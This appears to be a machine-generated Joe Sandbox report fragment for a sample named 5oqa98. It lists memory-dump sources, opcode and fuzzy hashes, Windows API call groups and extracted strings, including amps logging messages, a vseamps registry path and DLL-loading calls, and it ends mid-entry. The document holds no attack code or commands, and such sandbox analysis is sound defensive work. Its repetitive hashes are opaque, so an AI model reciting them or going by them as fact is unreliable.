                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                       • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -
                                                      • API String ID: 0-2547889144
                                                      • Opcode ID: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                                      • Instruction ID: f0a9775499ae8e11c0cd3741dc570bab2f5201344a81d2c1a5008a9dc88a1dca
                                                      • Opcode Fuzzy Hash: ac637b882370d0844742d876f6d50665fbc38b4c3acf89c25781960c99b4f2e0
                                                      • Instruction Fuzzy Hash: 7E91D4F2A047C485FBB2CE16B6083AA7AE0B7597E4F141516FF49236F4DB79C9448B40
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                       • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -
                                                      • API String ID: 0-2547889144
                                                      • Opcode ID: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                                      • Instruction ID: 8f8310eeb878d4aa74977829efb49c2c7de80d27e4d4fb150cd5d5e4432a17d7
                                                      • Opcode Fuzzy Hash: ab76a755316d4a48554b78acaf832b3985bbd0abb48915d025235a6fa293112f
                                                      • Instruction Fuzzy Hash: 51818FB26087C485F7B2CE16B5083AA7AA0F7997D8F141116FF45636F4DB79C984CB40
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                       • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: -
                                                      • API String ID: 0-2547889144
                                                      • Opcode ID: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                                      • Instruction ID: f8efd74c2ac63e8556513dce229926bc74ff59f5ae5890729ffd39c1599aad0a
                                                      • Opcode Fuzzy Hash: c4b1ae68995c86a4b6842fa045a9432b0b2524c7844d6ccb0434c0756f7f8cc7
                                                      • Instruction Fuzzy Hash: BE81B0F2608BC486F7A2CE16B5083AA7AA1F7587E4F140515FF59236F4DB79C984CB40
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                       • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                                      • Instruction ID: 63b5043dbdffafa71f1ddaca105bc0afa02b2cba45448f866c4c658d1faf9303
                                                      • Opcode Fuzzy Hash: 382482a43049451918361ff49eb8a1074a352d433c0d3f6017d26c5ae398af27
                                                      • Instruction Fuzzy Hash: B031B0B262129045F317AF37F941FAE7652AB897E0F514626FF29477E2CA3C88028704
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                       • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                                      • Instruction ID: b610fbdfd0d7c5655a75ac718b847164fa7f0802b4cc155a4829149d785d36e6
                                                      • Opcode Fuzzy Hash: b2d421cb8e45ff6c5d0cd91ffb7c0551f31bf35597a99ffb978e455b190e8185
                                                      • Instruction Fuzzy Hash: FE317EB262129445F717AF37B942BAE7652AB887F0F519716BF39077E2CA7C88018710
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                       • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                                      • Instruction ID: e0c281a5a51834f3cf9ef76d9d4ef001c4a7356b2a993cafd714ca14a0116626
                                                      • Opcode Fuzzy Hash: b1ae0088751324d3bee5442ce8c7f4399171e4b45f421078da355ce765193e83
                                                      • Instruction Fuzzy Hash: F831E472A1029056F31BAF77F881BDEB652A7C87E0F655629BB190B7E3CA3D84008700
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2355082229.00007FF8FF5D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8FF5D0000, based on PE: true
                                                       • Associated: 00000007.00000002.2355062025.00007FF8FF5D0000.00000002.00000001.01000000.00000009.sdmp
                                                       • Associated: 00000007.00000002.2355107387.00007FF8FF5E2000.00000002.00000001.01000000.00000009.sdmp
                                                       • Associated: 00000007.00000002.2355125582.00007FF8FF5ED000.00000004.00000001.01000000.00000009.sdmp
                                                       • Associated: 00000007.00000002.2355145279.00007FF8FF5EF000.00000002.00000001.01000000.00000009.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_7ff8ff5d0000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                                      • Instruction ID: 680689bc7f941e969c92b076af367193a65b7c31aee6f7cd4fe97a88ba4a720e
                                                      • Opcode Fuzzy Hash: 7a5a5e3725c53a151926f610c9bfb798d223dd818db9d286110f1e1aff9ffe1d
                                                      • Instruction Fuzzy Hash: 8FF06271B292A58FEBA6CF28A943A2977D1E75C3C0F94813DD6AD83B44D67C94608F04

                                                       Control-flow Graph (function 1400038d0-140003d49; the interactive graph with its Executed / Not Executed block colouring is not reproduced here, only the blocks that carry API calls or calls into other functions)
                                                       • Entry block 1400038d0-140003915: SetWaitableTimer
                                                       • Block 140003992-1400039d3: EnterCriticalSection, LeaveCriticalSection, WaitForMultipleObjects
                                                       • Block 140003a09-140003a1a: EnterCriticalSection; block 140003a6c-140003a8e: LeaveCriticalSection
                                                       • Block 140003a4b-140003a65: SetEvent, ResetEvent
                                                       • Block 140003d17: call 140001750; block 140003d21-140003d29: call 140002650
                                                       • 15 further blocks between 140003949 and 140003d0c carry the #4 annotation in the graph
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                       • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterEventLeave$MultipleObjectsResetTimerWaitWaitable
                                                      • String ID: amps_Listen: pHandle=%paction taken: %d$amps_Listen: pHandle=%pdetection accuracy: %d$amps_Listen: pHandle=%pdetection component type: %d$amps_Listen: pHandle=%pdetection message: %s$amps_Listen: pHandle=%pdetection name: %s$amps_Listen: pHandle=%pdetection type: %d$amps_Listen: pHandle=%peventId: %d$amps_Listen: pHandle=%pobject archive name: %s$amps_Listen: pHandle=%pobject name: %s$amps_Listen: pHandle=%pobject type: %d$amps_Listen: pHandle=%psession Id: %d$amps_Listen: pHandle=%p, message is:$amps_Listen: pHandle=%p, message received, pulling from AMP queue$amps_Listen: pHandle=%p, p=%p$amps_Listen: pHandle=%p, waiting for messages from the AMP queue$null
                                                      • API String ID: 1021822269-3147033232
                                                      • Opcode ID: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                                      • Instruction ID: ec7db78c4d4a766f71db07ed68f83fdabe3b60d74f96cc88383eff92a0be527c
                                                      • Opcode Fuzzy Hash: e7e75cb521e949a2fcfed2942cb356f66ccf7465466a17c5606e033b0a8adf5e
                                                      • Instruction Fuzzy Hash: E5D1DAB5205A4592EB12CF17E880BD923A4F78CBE4F454122BB0D4BBB5DF7AD686C350

                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                       • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: AddressProc$Library$Free$CriticalInitializeLoadSection
                                                      • String ID: MsiLocateComponentW$msi.dll$vseExec$vseGet$vseGlobalInit$vseGlobalRelease$vseInit$vseRelease$vseSet${7A7E8119-620E-4CEF-BD5F-F748D7B059DA}
                                                      • API String ID: 883923345-381368982
                                                      • Opcode ID: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                                      • Instruction ID: d19804ac2d128cc8e67db72781ea5cb7b7d89be94dae840b99a82102003c66a5
                                                      • Opcode Fuzzy Hash: b9a27f811b976282af616144a97be757c2cf76aa1f8607743da558726ba8644d
                                                      • Instruction Fuzzy Hash: F351EEB4221B4191EB52CF26F8987D823A0BB8D7C5F841515EA5E8B3B0EF7AC548C700
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                       • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Heap$CriticalSection$FreeProcess$EnterEventLeave$CloseHandle$MultipleObjectsResetWait
                                                      • String ID:
                                                      • API String ID: 1613947383-0
                                                      • Opcode ID: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                                      • Instruction ID: 4415f923c5b49a541c3c18af517eb333de188a5b32bf04682df7988820a44021
                                                      • Opcode Fuzzy Hash: e9680c11c9d284b0c3aa37b35d301596d2d95dd61f06f1daf2196339e6fd89f5
                                                      • Instruction Fuzzy Hash: 8D51D3BA204A4496E726DF23F85439A6361F79CBD1F044125EB9A07AB4DF39D599C300
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                       • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                       • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                                      • String ID:
                                                      • API String ID: 1995290849-0
                                                      • Opcode ID: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                                      • Instruction ID: 07b3271e3c5f19e1ab061b13c36c38fadfaaa54878a955e19646b3fb384661b9
                                                      • Opcode Fuzzy Hash: 50d905dbcd5d3d8e314177ba4d4162b1dc612bf36ecce00c392234b6cbb64ee5
                                                      • Instruction Fuzzy Hash: 7C31D3B6601B41A7EB16DF63F98439833A4FB9CB81F484014EB4A07A35DF39E4B98304
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                                      • String ID:
                                                      • API String ID: 1995290849-0
                                                      • Opcode ID: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                                      • Instruction ID: fd5ea752b6625aace240e5dc115a6ac8a79eac1ae5096a798ed6b9a4de507a32
                                                      • Opcode Fuzzy Hash: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                                      • Instruction Fuzzy Hash: B2311BB4511E0985EB07DF63FC943D423A6BB5CBD5F8D0129AB4A8B270EF3A8499C214
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$EnterLeave$CloseCreateValue
                                                      • String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                                      • API String ID: 93015348-1041928032
                                                      • Opcode ID: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                                      • Instruction ID: 955b1bef443a43e40f7389cebc0d05d3cfed999bfec6c75915e9fb821c1678e4
                                                      • Opcode Fuzzy Hash: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                                      • Instruction Fuzzy Hash: E3714676211A4082E762CB26F8507DA73A5F78D7E4F141226FB6A4B7F4DB3AC485C700
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
                                                      • String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
                                                      • API String ID: 3682727354-300733478
                                                      • Opcode ID: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                                      • Instruction ID: 5756194132ff8dd7ec1522ad033bffa79c37130547d86cec9d6c1639cfe77c95
                                                      • Opcode Fuzzy Hash: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                                      • Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
                                                      • String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
                                                      • API String ID: 2587151837-1427723692
                                                      • Opcode ID: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                                      • Instruction ID: a7c4065e0455d4df5ce4727384a6dec66c16779501c9bb3b2af2b379a082be6c
                                                      • Opcode Fuzzy Hash: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                                      • Instruction Fuzzy Hash: 9F5114B5225B4082FB13CB27F8847D963A5F78CBD0F445525BB4A4B7B8DB7AC4448700
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
                                                      • String ID: SetDllDirectoryW$kernel32.dll
                                                      • API String ID: 3184163350-3826188083
                                                      • Opcode ID: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                                      • Instruction ID: 3ea874f08b0d6ae9fbaedd0e680489d05007b391355801732f4c7fbd06edc96d
                                                      • Opcode Fuzzy Hash: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                                      • Instruction Fuzzy Hash: FD41F6B1218A8582EB22DF12F8547DA73A5F79D7D4F400125EB8A0BAB5DF7EC548CB40
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Heap$AllocProcesslstrlen
                                                      • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                                      • API String ID: 3424473247-996641649
                                                      • Opcode ID: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                                      • Instruction ID: 5475aedf582102907cd33adbfaf34f9b11ebc9e91273ce6565e0ea0cfbbdf015
                                                      • Opcode Fuzzy Hash: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                                      • Instruction Fuzzy Hash: FE3137B062A74082FB03CB53BD447E962A5E75DBD8F554019EB0E0BBB6DBBEC1558700
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: String$ByteCharMultiWide$ErrorLast
                                                      • String ID:
                                                      • API String ID: 1775797328-0
                                                      • Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                                      • Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
                                                      • Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                                      • Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700
                                                      APIs
                                                      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
                                                      • GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
                                                      • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
                                                      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
                                                      • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
                                                      • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
                                                      • MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
                                                      • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
                                                      • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
                                                      • String ID:
                                                      • API String ID: 1232609184-0
                                                      • Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                                      • Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
                                                      • Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                                      • Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
                                                      • API ID: Heap$CriticalSection$EnterFreeProcess$Leave
                                                      • String ID: H
                                                      • API String ID: 2107338056-2852464175
                                                      • Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                                      • Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
                                                      • Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                                      • Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.2354988888.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                                      • Associated: 00000007.00000002.2354970755.0000000140000000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355010332.0000000140014000.00000002.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355026686.000000014001A000.00000008.00000001.01000000.00000008.sdmp
                                                      • Associated: 00000007.00000002.2355042778.000000014001E000.00000002.00000001.01000000.00000008.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_7_2_140000000_5oqa98.jbxd
                                                      Similarity
